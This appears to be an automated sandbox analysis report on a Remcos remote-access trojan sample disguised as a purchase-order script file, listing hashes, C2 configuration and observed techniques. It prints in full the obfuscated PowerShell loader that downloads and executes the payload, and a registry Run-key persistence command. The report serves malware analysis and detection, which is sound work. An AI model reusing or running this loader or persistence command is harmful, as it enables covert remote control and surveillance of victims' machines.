remcos | 42459d2d84eff34c05f1dd8bdccd7c968606eefd5773bd8fa442cb2a053b3fa0

General

Target

narudžbenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf
Size

14KB
MD5

00ac87a7b7f4c47f372f933a0591f5a0
SHA1

7b598b1d68948d6a592d4bd28b7c8b1797705554
SHA256

42459d2d84eff34c05f1dd8bdccd7c968606eefd5773bd8fa442cb2a053b3fa0
SHA512

e2df538514eb5f1c76ad018ccc13a37f08667c337d2eed22669d11bdf8c83e75f72eb9f477e4264208606d65d2dd36f658f5982dd7d5f29c9c08232d207a125b
SSDEEP

384:ULqtQwkekctuEedeD42r2TT8FVB+4CpGH:UqtQI2j8G8F33Cpw

Score

10^/10

remcos remotehost discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

dumboi.duckdns.org:51525

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-8AXK3L
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	2096	powershell.exe
8	2732	msiexec.exe
10	2732	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udredende = "%Lossless% -windowstyle 1 $Sourish=(gp -Path 'HKCU:\\Software\\Trains40\\').Chromoplast167;%Lossless% ($Sourish)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2096	powershell.exe
2844	powershell.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2096	powershell.exe
2844	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2732	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2844	powershell.exe
2732	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1840	cmd.exe
2404	PING.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
908	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2404	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2096	powershell.exe
2844	powershell.exe
2844	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 2056 wrote to memory of 1840	2056	WScript.exe	30
PID 2056 wrote to memory of 1840	2056	WScript.exe	30
PID 2056 wrote to memory of 1840	2056	WScript.exe	30
PID 1840 wrote to memory of 2404	1840	cmd.exe	32
PID 1840 wrote to memory of 2404	1840	cmd.exe	32
PID 1840 wrote to memory of 2404	1840	cmd.exe	32
PID 2056 wrote to memory of 2096	2056	WScript.exe	33
PID 2056 wrote to memory of 2096	2056	WScript.exe	33
PID 2056 wrote to memory of 2096	2056	WScript.exe	33
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2844 wrote to memory of 2732	2844	powershell.exe	39
PID 2732 wrote to memory of 2332	2732	msiexec.exe	40
PID 2732 wrote to memory of 2332	2732	msiexec.exe	40
PID 2732 wrote to memory of 2332	2732	msiexec.exe	40
PID 2732 wrote to memory of 2332	2732	msiexec.exe	40
PID 2332 wrote to memory of 908	2332	cmd.exe	42
PID 2332 wrote to memory of 908	2332	cmd.exe	42
PID 2332 wrote to memory of 908	2332	cmd.exe	42
PID 2332 wrote to memory of 908	2332	cmd.exe	42

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\narudžbenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:2056
- C:\Windows\System32\cmd.exe
  cmd.exe /c ping 6777.6777.6777.677e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\system32\PING.EXE
    ping 6777.6777.6777.677e
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Kontointerval Strubehovederne Retromingently Celebreringen #>;$Udtrkning='Uforglemmeliges';<#Dispachrers Straffesagernes Genvlgende Mna caulescent #>;$Ofrings=$skvalderens+$host.UI;If ($Ofrings) {$Relernes214nterval++;}function ridsenaalens($Ootocous){$Flyverens=$Respue+$Ootocous.'Length'-$Relernes214nterval; for( $Relernes214=7;$Relernes214 -lt $Flyverens;$Relernes214+=8){$Lepidosauria='Fribytter';$Paavirkendes+=$Ootocous[$Relernes214];$Thighs='strklrredernes';}$Paavirkendes;}function Singlescullerne($Bortfaldendes){ & ($Sixtieths105) ($Bortfaldendes);}$Chrysis=ridsenaalens 'OvergraMBryggedoFeatherzStjerneiDahome ldeputerlalfade,aTaarnug/Carth g5 Fatti..slvfade0 ilbage Indsprj(DisilluW TrochoiKys.strn Poro,idAdelphiofroisesw Impo tsB oting TalismaNSparkisTMis.abl Ma mho1Uter ab0Tal.str.Paynimf0Viviend; yppig rendezWUnmortgi Pozet nk nsule6Unconsc4Rh,pidi;Verti i Kanon nxAnstalt6Etageva4Meta tr; Hov dk Paral,ir BibliovQuindec: Ko sen1R.allns2Lactuc.1Tilbage.Nas.for0Aftjent)B.ndsaa Hderli.GLigblegeLnserprc ntaink Skrabeo,orsaml/Catenul2Pligtfo0Eskapis1Konturl0Straffe0 Thorac1Eugen,l0magistr1Kastesm ExecutiFCarboniiSchchtsr .ankefeKame erf RestoroFuldti xA,toopr/Pteropo1 rgent2Bouetbu1 Katte,.Forttte0Hakealb ';$Diderichs=ridsenaalens 'LipaemiUDipleu.SDodecylEJackbirr zanjon-AxminstA Dort.eGRiddersEKonkursNSyvsovetDraught ';$Vgavisernes=ridsenaalens 'KamaruphF,lketlt L angttPolymelp Beefeds Entitl:Latentl/F.rmant/ hermangKrukk roPotpourvMuggin aProcrealBundlaglOveranxcAppling.G,andamofilmeb rKvinderg Vedhft/ uskadMAnve dea Forbr.nCauteryd Film,ta LoquacnSnd gent kovfyeClef.udrSt vninnSwathineLuminops Drikke1Sicilia7Dumpeka1Driftsp. enaissaEksplosc Dunbirapi.neer ';$Deactivating=ridsenaalens 'Uriskin>Kondita ';$Sixtieths105=ridsenaalens ' C,bsbiI BetonbeKvutzaiXTagvrke ';$Seleucidic='Platopic';$Bearbejdningerne214='\Delicat.Enk';Singlescullerne (ridsenaalens 'Dgenigt$EjendomGO teretLVin nerOTeeto ub LsehasASla terl Stockb:SpeedinNSelvantYIndologMEngraf,PGradelyhJujuistOPrse foLB.varysegru,pemPA tomektPre ent=Toffsas$InddkkeEArabizenFornuftVSymboli:Domini A ScholapBowdlerpOr.hoscdBelrtskAKadmiumT BankbeaShaslik+Veteran$O startbStofmise,ulfuriAThora,ir NumerabMakutase Ouch dJ TendendFrimndsnimpendei SprangNUlt,astGSving sEProgramrUnequalni ndehaeRecrush2Tessara1 ,rsteg4 Leksik ');Singlescullerne (ridsenaalens 'Larmen.$Lift pagKrysantlAldermeoClar.nib Ma hicAPrefad LUdtvre.:Dadais,QSealyh.U Akva.iAUnig,niVHeterogEIndkomsrQu ckeniMowlandn ,mittegMorrosbl TonersY Acidos= .smosi$inceptivSkylning KontraaBaandstV BusaosI OtherwSUnattenEUnscantRBriket.nParlayiE uldsmsAfnazif.NattierS .estigp ilbagLFilmcenIUndert.THavrnen(M.lbrou$CosheriD SinoloeSkgla eABrudde CSombrertHoneysui BidflaVS ortrjA entraltEuripusiHeid erN FrightgPresymp) Bignon ');Singlescullerne (ridsenaalens 'Protog [ SkrmbiN DepraveT rascaTAnsgnin. MarginS S arereInducerrPlades VMurvaloiDiskettC Afly eELoyalespHjulpisOIcebergITropicaNWindel.tResuit,MTinder AHe melinMiddle aTorsdaggImedenseBremsesrDevalue]Byzoner:Ationer:PepinosSUpraiseeProtanoCAgentryUGrundforCatvvidi Drikk,tFotomonyHyperboP Classrr Oversio LigninTgyro agoArtist c UlyksaOForstaalStorher Novosd=Todages strmn n[S angemnSt rbarE edisniTParapod.Sporidis ,adiole skraldcunveilpuInannasREa thfaIKroketktE sterryUtahl,kPInt mperUn,erbeoAndrhacTKontoplOMuricoiCvarmeleoUncultulNoncirctLipidshy G.ldstpportrspeUngiven]Veksles:Dyingep:Tres,alTMu.ikalLTulipflS Overga1Densito2Eksempe ');$Vgavisernes=$Quaveringly[0];$kardanernes=(ridsenaalens 'Infanti$Quini lg TarryilRivetheOSundhedBJap axiaTidsbesLTagvrke:Puruloir BananseAnfoerePPaateg OPhycoxaUSkrmfelsUnderl.s PoisonEDeposit=eu omannreobjeceSbeurteWphaneri-plantenoNonpariBPara ynJVveriere DunenecSurrountLoftsru U lsninsPresseeYLgnedetSCoharmotFrijordEOv.rmtnmArneste.BelnninN ,dredteLaminerTSk,lsaa.Man ikiWPredi.eE AffaldbKonf.recSoc oceLpodsoldIWhat itEDiapasoNCementetNephros ');Singlescullerne ($kardanernes);Singlescullerne (ridsenaalens 'Opr kla$AndreasRWoolmene intergpBriterto Li.cheuSup.rimsReverins SannyaeBol erv.KostaldHNautilieSlyn,boa DiametdVarelageSlubbetrTil.taas diplo [Woollyo$ScaffjuDTir dagi FiletkdRaskesae JumpsurRot lski MutesacSilkesohFrottehsSlidser]Unme iu=skandal$ScotchiCHelmetphDial.ktrAbonninyObject sFebreoviStberansVerdens ');$Overdoctrinize=ridsenaalens ' Lillib$Reco taRPu.porteHjerterpPebbl do,ueridauDeeskalsVenstresJusticee Paasky.AasenswD BiograoBykongewHmm desnDa.natol StetosoHumanisa ConcildFlngessF DyreveiDdskn elHarborseVogtesg(Takkefe$ Loos rVSe.gebogCarbolfaQuarrelvYawnproi,krubnis Paamone PokomorEquivalnUncontre Underss Stvlet,Att ibu$FrancisM ordbunabesvimebAndespii PreboinDyrebaroSjuskedgU,bombni Bureauo Immig,nUdetill) ragtgo ';$Mabinogion=$Nympholept;Singlescullerne (ridsenaalens 'Pepperi$Oo thalGpalmehal TreholO Immo ibfje,debA harrumLMellemb: ObservMOrdg deE reinksTMulcibehCentra E Udbrn.nKvanti y RamtesLAtomsto=Enddama(Smleriet Mid.aseGossipms akkekaT Dev ra-NonmusipInspecta A,lutiTSkrfninHi onisk Unfatte$MorphogmSidestiAMaskinhB ManostIOut tudnKontrolOFrprisugAagerubI StandaoHvssed nSaraban)Steri r ');while (!$Methenyl) {Singlescullerne (ridsenaalens ' Skolek$H lvvaagTrfriwil GithssoKonsignbEtpartiaKroni,rlDealate:ArchpilN ConcedoLagerinrDefossit Mar arhEfterslwMot vosa BegribrVrneplidHeder,e1ou weav8Ldervin=Korn li$ ReastytaplanobrSommervu Mouse,eGastroe ') ;Singlescullerne $Overdoctrinize;Singlescullerne (ridsenaalens 'scramassBosslettSuppeviAArthrotrTraktertBonanza- AfspalsMyotherlekserceEAr oretEGangb.ePDekantg Slavel 4Sr.tter ');Singlescullerne (ridsenaalens 'Statuar$OceanoggUndergrL RealkaO .iraarBWalleyeADextrall ntepo: Ursagemharts.oeBogui.gTBeklagehGangt nePlejlf NZaremasyKata ulLAugm,nt=Clavilu(Amuguist oxcomieDatabraS EkspretHa enpa-skr aplPTil odeAFastelatPlebeiaH.ostret Sabe.l$ ReluctmMaeandeaMde ligB TeleskiAssagainViciousoRuslandgVinyl oiLockat o extromNChemist)Krigser ') ;Singlescullerne (ridsenaalens 'S.aadel$TuneserG TabtasL G ringoN ragheB Expo.taYardinglNonproj:TritelytK iminorEneulykASlvtjssi As,ignNTrans,oa OlivingUnseemieP,renti=Sunroom$CrepitoG PilotpLBurun.iomuc indb D monsATestprolMishand:LuftfarDLgensstaCuriacutSav rleaHandelsBCzechsoaBlo.besSskrmtvieg dkendAOrrisrodWastepaMRhizoceiOr ngutnNiacin,iP,roracS mericaTOmgaaelrAmraintA RidicutPlastreIInto.erOSubtot NamourouEPraelecrUrostif+Ru elen+Nitride%thrilla$,onvisuqOprejstu Vario.a PursuiVTet atoEBlinde,rOpalesciEigenstN AikenrgTiresfrLLeucomaYS,desyn.Stvningc DrageloHidsighUgrandneN AchaetTOrthot ') ;$Vgavisernes=$Quaveringly[$trainage];}$Ankomsttiden=321370;$Nightlike=33753;Singlescullerne (ridsenaalens 'D.vital$SkiftepGOverneulPont.sgoCaricesbSpejlinAR adgivlDrikkeh: S mmenP Telefor,atewarCAfsondrIUl.ramasMysteriiTilfldio Ubrd.lnSisterhsOmsor sASteatosrPseud pBOpkrvniE VandgaJTob,ggaDparen eeCumulocTViljelsshanknsv Stttefo=Backhau Un ansg avaersETalkolotNccskad-NonreclClin efoOLac.estN Jelonat RenummERetr evnInt rnuTChristi Takkel.$ SybariMCan likA SemafobBloodi,iSilverbN SilkesoForbehoGIde litIbaviaanO UbetvinCasefie ');Singlescullerne (ridsenaalens 'Tupi,ak$Foregivg.orstaalLight.ro G,iastb Eyebeaaspaget l Bernh :TriariaA Peris lPissoi aspej.blr Aar,skmAnpartsePunkiesrOpdr.gee Co dovdMouseioeEc,rtessColvern Granula=Overd,b Monop.[TvrendeSUncakrnyOmma easGabmarmtEyecupseSkbne,lmMackle,.FilibusCVaporetoScrawninClangerv MembraemicrojurStatsratConscri] Modefo: Kamply:cele reFP,thonorbarnevro Ex,atrmTanniesBKopulakaDrailinsNayapreeGgennet6Dybblsb4Boatlo S yntetit RrsangrSocialmi Svi dsnPo.tgang Tilsky( Coal a$NaturfaPScowm nrArbejdecT lhylniKevinsdsprologui SleskloEksportnscrupulsha.tensacatso,srForsirib ulliloeRak,tisjPlenarmdSagittieDisubsttStriktus almin) gl,nsb ');Singlescullerne (ridsenaalens ' omri g$Ud algeGTur idilFluteneo nugglBD.ggeriaStegninL orgmu:HavmiljCNo.demoRGeneraleGlo aliaHo perdtByraa siBe lestnTangforUSlvlamerAlvildei HulemaASurde t Oligoch=Puccoon Do belt[ VariabSB ckwinY utstans lind.rtGeo etrE oldwatmGowpina.Di bolotUdd taseFreudiaXTjre elTBindest.Baryt,fEZeol ttnBal neycNo itseoWoodcocdDaarpoliFlng.rnn TheoloGPassuss]Craftsm:Coun er:Unsa itAR kindlsWinebibc.oolskiiDraphavi Halter.HeelpriGVestmagEEnum raT FllesssT lstaatB.flittrForetagIYokewoonEksaminG Trykfa(Sultest$DaakalvaMon,rchL Pr nelAEntabler Blo,erm ForestELi iestRFor udsEAnlgsfodTrissebeRi.gforsIdmtesk) mekani ');Singlescullerne (ridsenaalens 'C lesin$ AphicigTerebraLFrsteplOLabbenlbDamphamaLrermdel,aveeje:SkoggerfFertiliuAncylosNAkupunkKProjicitGrundbyIGro elioLacerabnDestru E k anisLSvangreT Spanis=Snozzle$Mudd.olcKatrynsr LandbrEFinnsmaatru ntnT averei ThanatnConimenUBundfloRObsknitiCriddleaMorfade.PartnersImpertiUWhinni BUn,karlSMornen.tAnarchaR VaporiiPerigasn Demok.GTr punk(Quethef$GalleriAMestresN De raukSys emfoSynkronm asqueS Retteath terocT Reol,wi painfudgr fikreAvancerNBetisut,Aktivis$ NonexcN NonsaliPolychrGblyantsHFrictioT hyenifL Li hodiMajorerKHypernaE ydafri)a tenik ');Singlescullerne $Funktionelt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Kontointerval Strubehovederne Retromingently Celebreringen #>;$Udtrkning='Uforglemmeliges';<#Dispachrers Straffesagernes Genvlgende Mna caulescent #>;$Ofrings=$skvalderens+$host.UI;If ($Ofrings) {$Relernes214nterval++;}function ridsenaalens($Ootocous){$Flyverens=$Respue+$Ootocous.'Length'-$Relernes214nterval; for( $Relernes214=7;$Relernes214 -lt $Flyverens;$Relernes214+=8){$Lepidosauria='Fribytter';$Paavirkendes+=$Ootocous[$Relernes214];$Thighs='strklrredernes';}$Paavirkendes;}function Singlescullerne($Bortfaldendes){ & ($Sixtieths105) ($Bortfaldendes);}$Chrysis=ridsenaalens 'OvergraMBryggedoFeatherzStjerneiDahome ldeputerlalfade,aTaarnug/Carth g5 Fatti..slvfade0 ilbage Indsprj(DisilluW TrochoiKys.strn Poro,idAdelphiofroisesw Impo tsB oting TalismaNSparkisTMis.abl Ma mho1Uter ab0Tal.str.Paynimf0Viviend; yppig rendezWUnmortgi Pozet nk nsule6Unconsc4Rh,pidi;Verti i Kanon nxAnstalt6Etageva4Meta tr; Hov dk Paral,ir BibliovQuindec: Ko sen1R.allns2Lactuc.1Tilbage.Nas.for0Aftjent)B.ndsaa Hderli.GLigblegeLnserprc ntaink Skrabeo,orsaml/Catenul2Pligtfo0Eskapis1Konturl0Straffe0 Thorac1Eugen,l0magistr1Kastesm ExecutiFCarboniiSchchtsr .ankefeKame erf RestoroFuldti xA,toopr/Pteropo1 rgent2Bouetbu1 Katte,.Forttte0Hakealb ';$Diderichs=ridsenaalens 'LipaemiUDipleu.SDodecylEJackbirr zanjon-AxminstA Dort.eGRiddersEKonkursNSyvsovetDraught ';$Vgavisernes=ridsenaalens 'KamaruphF,lketlt L angttPolymelp Beefeds Entitl:Latentl/F.rmant/ hermangKrukk roPotpourvMuggin aProcrealBundlaglOveranxcAppling.G,andamofilmeb rKvinderg Vedhft/ uskadMAnve dea Forbr.nCauteryd Film,ta LoquacnSnd gent kovfyeClef.udrSt vninnSwathineLuminops Drikke1Sicilia7Dumpeka1Driftsp. enaissaEksplosc Dunbirapi.neer ';$Deactivating=ridsenaalens 'Uriskin>Kondita ';$Sixtieths105=ridsenaalens ' C,bsbiI BetonbeKvutzaiXTagvrke ';$Seleucidic='Platopic';$Bearbejdningerne214='\Delicat.Enk';Singlescullerne (ridsenaalens 'Dgenigt$EjendomGO teretLVin nerOTeeto ub LsehasASla terl Stockb:SpeedinNSelvantYIndologMEngraf,PGradelyhJujuistOPrse foLB.varysegru,pemPA tomektPre ent=Toffsas$InddkkeEArabizenFornuftVSymboli:Domini A ScholapBowdlerpOr.hoscdBelrtskAKadmiumT BankbeaShaslik+Veteran$O startbStofmise,ulfuriAThora,ir NumerabMakutase Ouch dJ TendendFrimndsnimpendei SprangNUlt,astGSving sEProgramrUnequalni ndehaeRecrush2Tessara1 ,rsteg4 Leksik ');Singlescullerne (ridsenaalens 'Larmen.$Lift pagKrysantlAldermeoClar.nib Ma hicAPrefad LUdtvre.:Dadais,QSealyh.U Akva.iAUnig,niVHeterogEIndkomsrQu ckeniMowlandn ,mittegMorrosbl TonersY Acidos= .smosi$inceptivSkylning KontraaBaandstV BusaosI OtherwSUnattenEUnscantRBriket.nParlayiE uldsmsAfnazif.NattierS .estigp ilbagLFilmcenIUndert.THavrnen(M.lbrou$CosheriD SinoloeSkgla eABrudde CSombrertHoneysui BidflaVS ortrjA entraltEuripusiHeid erN FrightgPresymp) Bignon ');Singlescullerne (ridsenaalens 'Protog [ SkrmbiN DepraveT rascaTAnsgnin. MarginS S arereInducerrPlades VMurvaloiDiskettC Afly eELoyalespHjulpisOIcebergITropicaNWindel.tResuit,MTinder AHe melinMiddle aTorsdaggImedenseBremsesrDevalue]Byzoner:Ationer:PepinosSUpraiseeProtanoCAgentryUGrundforCatvvidi Drikk,tFotomonyHyperboP Classrr Oversio LigninTgyro agoArtist c UlyksaOForstaalStorher Novosd=Todages strmn n[S angemnSt rbarE edisniTParapod.Sporidis ,adiole skraldcunveilpuInannasREa thfaIKroketktE sterryUtahl,kPInt mperUn,erbeoAndrhacTKontoplOMuricoiCvarmeleoUncultulNoncirctLipidshy G.ldstpportrspeUngiven]Veksles:Dyingep:Tres,alTMu.ikalLTulipflS Overga1Densito2Eksempe ');$Vgavisernes=$Quaveringly[0];$kardanernes=(ridsenaalens 'Infanti$Quini lg TarryilRivetheOSundhedBJap axiaTidsbesLTagvrke:Puruloir BananseAnfoerePPaateg OPhycoxaUSkrmfelsUnderl.s PoisonEDeposit=eu omannreobjeceSbeurteWphaneri-plantenoNonpariBPara ynJVveriere DunenecSurrountLoftsru U lsninsPresseeYLgnedetSCoharmotFrijordEOv.rmtnmArneste.BelnninN ,dredteLaminerTSk,lsaa.Man ikiWPredi.eE AffaldbKonf.recSoc oceLpodsoldIWhat itEDiapasoNCementetNephros ');Singlescullerne ($kardanernes);Singlescullerne (ridsenaalens 'Opr kla$AndreasRWoolmene intergpBriterto Li.cheuSup.rimsReverins SannyaeBol erv.KostaldHNautilieSlyn,boa DiametdVarelageSlubbetrTil.taas diplo [Woollyo$ScaffjuDTir dagi FiletkdRaskesae JumpsurRot lski MutesacSilkesohFrottehsSlidser]Unme iu=skandal$ScotchiCHelmetphDial.ktrAbonninyObject sFebreoviStberansVerdens ');$Overdoctrinize=ridsenaalens ' Lillib$Reco taRPu.porteHjerterpPebbl do,ueridauDeeskalsVenstresJusticee Paasky.AasenswD BiograoBykongewHmm desnDa.natol StetosoHumanisa ConcildFlngessF DyreveiDdskn elHarborseVogtesg(Takkefe$ Loos rVSe.gebogCarbolfaQuarrelvYawnproi,krubnis Paamone PokomorEquivalnUncontre Underss Stvlet,Att ibu$FrancisM ordbunabesvimebAndespii PreboinDyrebaroSjuskedgU,bombni Bureauo Immig,nUdetill) ragtgo ';$Mabinogion=$Nympholept;Singlescullerne (ridsenaalens 'Pepperi$Oo thalGpalmehal TreholO Immo ibfje,debA harrumLMellemb: ObservMOrdg deE reinksTMulcibehCentra E Udbrn.nKvanti y RamtesLAtomsto=Enddama(Smleriet Mid.aseGossipms akkekaT Dev ra-NonmusipInspecta A,lutiTSkrfninHi onisk Unfatte$MorphogmSidestiAMaskinhB ManostIOut tudnKontrolOFrprisugAagerubI StandaoHvssed nSaraban)Steri r ');while (!$Methenyl) {Singlescullerne (ridsenaalens ' Skolek$H lvvaagTrfriwil GithssoKonsignbEtpartiaKroni,rlDealate:ArchpilN ConcedoLagerinrDefossit Mar arhEfterslwMot vosa BegribrVrneplidHeder,e1ou weav8Ldervin=Korn li$ ReastytaplanobrSommervu Mouse,eGastroe ') ;Singlescullerne $Overdoctrinize;Singlescullerne (ridsenaalens 'scramassBosslettSuppeviAArthrotrTraktertBonanza- AfspalsMyotherlekserceEAr oretEGangb.ePDekantg Slavel 4Sr.tter ');Singlescullerne (ridsenaalens 'Statuar$OceanoggUndergrL RealkaO .iraarBWalleyeADextrall ntepo: Ursagemharts.oeBogui.gTBeklagehGangt nePlejlf NZaremasyKata ulLAugm,nt=Clavilu(Amuguist oxcomieDatabraS EkspretHa enpa-skr aplPTil odeAFastelatPlebeiaH.ostret Sabe.l$ ReluctmMaeandeaMde ligB TeleskiAssagainViciousoRuslandgVinyl oiLockat o extromNChemist)Krigser ') ;Singlescullerne (ridsenaalens 'S.aadel$TuneserG TabtasL G ringoN ragheB Expo.taYardinglNonproj:TritelytK iminorEneulykASlvtjssi As,ignNTrans,oa OlivingUnseemieP,renti=Sunroom$CrepitoG PilotpLBurun.iomuc indb D monsATestprolMishand:LuftfarDLgensstaCuriacutSav rleaHandelsBCzechsoaBlo.besSskrmtvieg dkendAOrrisrodWastepaMRhizoceiOr ngutnNiacin,iP,roracS mericaTOmgaaelrAmraintA RidicutPlastreIInto.erOSubtot NamourouEPraelecrUrostif+Ru elen+Nitride%thrilla$,onvisuqOprejstu Vario.a PursuiVTet atoEBlinde,rOpalesciEigenstN AikenrgTiresfrLLeucomaYS,desyn.Stvningc DrageloHidsighUgrandneN AchaetTOrthot ') ;$Vgavisernes=$Quaveringly[$trainage];}$Ankomsttiden=321370;$Nightlike=33753;Singlescullerne (ridsenaalens 'D.vital$SkiftepGOverneulPont.sgoCaricesbSpejlinAR adgivlDrikkeh: S mmenP Telefor,atewarCAfsondrIUl.ramasMysteriiTilfldio Ubrd.lnSisterhsOmsor sASteatosrPseud pBOpkrvniE VandgaJTob,ggaDparen eeCumulocTViljelsshanknsv Stttefo=Backhau Un ansg avaersETalkolotNccskad-NonreclClin efoOLac.estN Jelonat RenummERetr evnInt rnuTChristi Takkel.$ SybariMCan likA SemafobBloodi,iSilverbN SilkesoForbehoGIde litIbaviaanO UbetvinCasefie ');Singlescullerne (ridsenaalens 'Tupi,ak$Foregivg.orstaalLight.ro G,iastb Eyebeaaspaget l Bernh :TriariaA Peris lPissoi aspej.blr Aar,skmAnpartsePunkiesrOpdr.gee Co dovdMouseioeEc,rtessColvern Granula=Overd,b Monop.[TvrendeSUncakrnyOmma easGabmarmtEyecupseSkbne,lmMackle,.FilibusCVaporetoScrawninClangerv MembraemicrojurStatsratConscri] Modefo: Kamply:cele reFP,thonorbarnevro Ex,atrmTanniesBKopulakaDrailinsNayapreeGgennet6Dybblsb4Boatlo S yntetit RrsangrSocialmi Svi dsnPo.tgang Tilsky( Coal a$NaturfaPScowm nrArbejdecT lhylniKevinsdsprologui SleskloEksportnscrupulsha.tensacatso,srForsirib ulliloeRak,tisjPlenarmdSagittieDisubsttStriktus almin) gl,nsb ');Singlescullerne (ridsenaalens ' omri g$Ud algeGTur idilFluteneo nugglBD.ggeriaStegninL orgmu:HavmiljCNo.demoRGeneraleGlo aliaHo perdtByraa siBe lestnTangforUSlvlamerAlvildei HulemaASurde t Oligoch=Puccoon Do belt[ VariabSB ckwinY utstans lind.rtGeo etrE oldwatmGowpina.Di bolotUdd taseFreudiaXTjre elTBindest.Baryt,fEZeol ttnBal neycNo itseoWoodcocdDaarpoliFlng.rnn TheoloGPassuss]Craftsm:Coun er:Unsa itAR kindlsWinebibc.oolskiiDraphavi Halter.HeelpriGVestmagEEnum raT FllesssT lstaatB.flittrForetagIYokewoonEksaminG Trykfa(Sultest$DaakalvaMon,rchL Pr nelAEntabler Blo,erm ForestELi iestRFor udsEAnlgsfodTrissebeRi.gforsIdmtesk) mekani ');Singlescullerne (ridsenaalens 'C lesin$ AphicigTerebraLFrsteplOLabbenlbDamphamaLrermdel,aveeje:SkoggerfFertiliuAncylosNAkupunkKProjicitGrundbyIGro elioLacerabnDestru E k anisLSvangreT Spanis=Snozzle$Mudd.olcKatrynsr LandbrEFinnsmaatru ntnT averei ThanatnConimenUBundfloRObsknitiCriddleaMorfade.PartnersImpertiUWhinni BUn,karlSMornen.tAnarchaR VaporiiPerigasn Demok.GTr punk(Quethef$GalleriAMestresN De raukSys emfoSynkronm asqueS Retteath terocT Reol,wi painfudgr fikreAvancerNBetisut,Aktivis$ NonexcN NonsaliPolychrGblyantsHFrictioT hyenifL Li hodiMajorerKHypernaE ydafri)a tenik ');Singlescullerne $Funktionelt;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udredende" /t REG_EXPAND_SZ /d "%Lossless% -windowstyle 1 $Sourish=(gp -Path 'HKCU:\Software\Trains40\').Chromoplast167;%Lossless% ($Sourish)"
    3⤵
